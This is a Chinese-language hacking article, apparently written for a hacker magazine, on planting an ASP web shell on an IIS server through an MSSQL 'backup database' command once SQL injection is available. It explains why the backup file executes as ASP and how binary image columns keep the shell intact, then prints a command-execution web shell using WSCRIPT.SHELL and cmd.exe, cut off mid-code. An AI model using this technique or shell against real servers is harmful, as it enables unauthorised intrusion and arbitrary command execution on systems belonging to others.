type="14237"> ●写在前面：

    本来这也不是什么大不了的东西，但是我写了还没有贴出来的时候，有一天QQ上居然有人神神秘秘地把这篇文章传给了我，隔了不久又有人送了我一个这方面的工具！我好感动哦，5555555~
    我也不追问他们是哪里得来的了，我给过的就几个，总是这样子传出去的吧。反正大家都知道，也没有什么好保留的，于是在黑防四期上骗了点钱，过程就是这样。
    过了五一节我拿出原来写的又改了一下，webshell改得更短，加了些在括号中的注释，不过，最重要的还是加了下面一句：

+----------------------------------------+
|谨以此文献给我最最最最最喜欢的宝贝星星。|
+----------------------------------------+

●正文：


    最早想到利用数据库系统来写文件大约是在看到MySQL相关文章的时候，我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的，第一步，也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。回过头来我想，ACCESS功能不那么强大，有注入漏洞的时候也不能直接获得执行任何命令的权限，就不去看了（事实上还是可以……）；MSSQL倒是有很多人详细研究过，执行命令的方法罗列了很多，可是没有了exec的权限，所做的还是有限。很多人就在问，MSSQL下面能不能导出一张表到文件，就像MySQL那样子，至少先获得一个低权限的shell来看看，我找来找去也没有找到导出表的命令，只好退而求其次——不能导出表，那就只好导出数据库了。

    在说明做法前，还是先来看看为什么可以。IIS在通过asp.dll处理.asp扩展名文件的时候，对<%%>以外的内容，不做任何处理就直接输出，比如拷贝一个.exe文件到web发布目录，改扩展名为.asp后在IE中请求，返回来的结果是多半是.exe文件的内容，而不会是一个500服务器内部错误。而对于<%%>括起来的内容，默认情况下是按照VBScripts的方式解释执行后给出结果，如果在<%%>里面的内容有语法错误，才会出现常见的500服务器内部错误。换句话说，如果有一个以.asp为扩展名的文件，只要能精心控制所有的<%%>中的内容，我们就能够让它正确的执行，而至于<%%>以外的东西，asp.dll不去处理它，我们也不去关心。（这个有点像我朋友在做的预处理，<%%>外的就像是注释，里面的东西才被解释执行然后返回结果）

    再来看看在MSSQL下使用backup database的情况。随便导出一个数据库看看，比如model，当然了，可以在查询分析器中做：

    backup database model to disk='c:\a.txt'

    用文本的方式打开这个文件，查找是否存在<%和%>，呵呵，显然是没有的吧。通过上面的分析，我们知道，如果把这个文件改扩展名为.asp后，请求时不会出现问题，也就是说我们的请求会返回文本方式的内容。默认的导出文件不会导致解释执行时的错误，这是很关键的一步。下面我们要让他变为一个shell，方法自然是做一个表进去，表的内容在备份的时候一定会被存储到备份文件中去的，我们可以控制表的内容，自然也可以控制备份文件的内容。

    到这里可能有人已经想一股脑儿把经典的asp shell的内容写入新建的表然后backup database了，嗯，还没有那么简单，你这样做了的话，如果还想继续我们的实验，那可能要花上重装MSSQL的代价。对于文本类型等的数据，比如text,nvchar等，在数据库中可能的形式是“abc”，但是在导出文件中，已经变成了宽字符的形式，成了“a b c ”，这样子的话，即使你好心写的是一个“<%”，到了备份文件中，一样的成了“< % ”，里面的内容更是乱七八糟，根本不会被解释执行了（你自己不妨做个试验，我只重装了两次而已）。为了避免这种情况，我们创建的表列项应该是一个二进制形式的，比如属性为image，这样子，在里面添加的内容，原来是什么导出的备份文件中也就是什么，规规矩矩的，一点都不会变了。

    到了这里，最后只剩下一个问题了，就算你把asp shell的内容写入新建的二进制表，总不会是单独的一行吧（也就是一条记录），谁知道同一个表的两行之间，在导出的备份文件中会不会还有其它的一些内容呢，如果是这样的话，前面一行<%后的内容倒是可以，中间如果有些乱七八遭的数据，用VBScripts的方式解释执行百分之一百是一个500错误。所以每一行必须是一个完整的<%%>，这样子，我们才能完全的控制<%%>内的内容，保证能够得到一个正确无误的asp shell。

    OK，终于到了实践的部分了。通过上面的分析，应该知道利用backup database来做一个shell是完全可行的，我们先来改写一下那个利用FSO的asp shell，使其能够符合我们的要求：

<% Dim oScript %>
<% Dim oScriptNet%>
<% Dim oFileSys, oFile%>
<% Dim szCMD, szTempFile%>
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>
<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>
<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>
<% szCMD = Request.Form(".CMD")%>
<% If (szCMD <> "") Then%>
<% szTempFile = "C:\" & oFileSys.GetTempName()%>
<% Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>
<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>
<% End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>
<% If (IsObject(oFile)) Then%>
<% On Error Resume Next%>
<% Response.Write Se